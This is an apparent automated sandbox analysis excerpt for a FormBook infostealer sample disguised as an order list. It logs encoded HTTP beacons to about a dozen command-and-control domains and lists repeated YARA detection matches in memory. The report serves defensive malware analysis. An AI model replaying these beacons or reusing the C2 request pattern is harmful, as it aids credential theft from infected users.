Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ08 HTTP/1.1Host: www.librairie-adrienne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs HTTP/1.1Host: www.alifdanismanlik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.anniebapartments.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU HTTP/1.1Host: www.20dzwww.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt HTTP/1.1Host: www.rematedeldia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.t1uba.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY HTTP/1.1Host: www.bestpleasure4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.cielotherepy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp HTTP/1.1Host: www.pkem.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.mehfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49749 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: Noua lista de comenzi.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Yara signature match
Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
